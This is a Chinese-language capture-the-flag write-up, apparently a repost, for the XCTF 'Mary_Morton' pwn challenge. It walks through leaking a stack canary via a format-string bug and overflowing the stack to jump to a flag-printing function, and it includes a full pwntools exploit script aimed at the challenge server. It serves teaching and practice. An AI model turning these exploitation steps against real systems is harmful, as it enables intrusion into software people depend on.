[攻防世界 pwn]——Mary_Morton
生活随笔
收集整理的這篇文章主要介紹了
[攻防世界 pwn]——Mary_Morton
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
[攻防世界 pwn]——Mary_Morton
- 題目地址: https://adworld.xctf.org.cn/
- 題目:
checksec看下,64位還開啟了NX和canary保護。(一般開啟canary保護,都有格式化字符串漏洞)
在IDA中看看, 果然有格式化字符串漏洞
仔細看看代碼會發(fā)現(xiàn), 這個是個死循環(huán), 1 里面有棧溢出, 2里面有格式化字符串漏洞, 3是退出。
我們可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用棧溢出修改返回地址了。
最近我學(xué)了一個新的, 計算偏移的方法,很好用。當然你也可以下斷點自己在gdb里面自己看, 自己調(diào)試
一般寫八個就夠了, 基本都在8個偏移以內(nèi),和自身的偏移。好像好多都是6, 這個也是。
因為61對應(yīng)97就是a
然后找一下canary和輸入之間的偏移
所以最終的偏移為 17 + 6 =23
我們還知道cat_flag的地址
exploit
from pwn import * p=remote('111.200.241.244',42124)p.sendlineafter('3. Exit the battle','2') p.sendline('%23$p')p.recvuntil('0x') canary=int(p.recv(16),16) print "canary: " + hex(canary)flag_addr=0x4008da payload='a'*0x88+p64(canary)+'a'*8+p64(flag_addr) p.sendlineafter('3. Exit the battle','1') p.sendline(payload)p.interactive()總結(jié)
以上是生活随笔為你收集整理的[攻防世界 pwn]——Mary_Morton的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——forgot
- 下一篇: [攻防世界 pwn]——warmup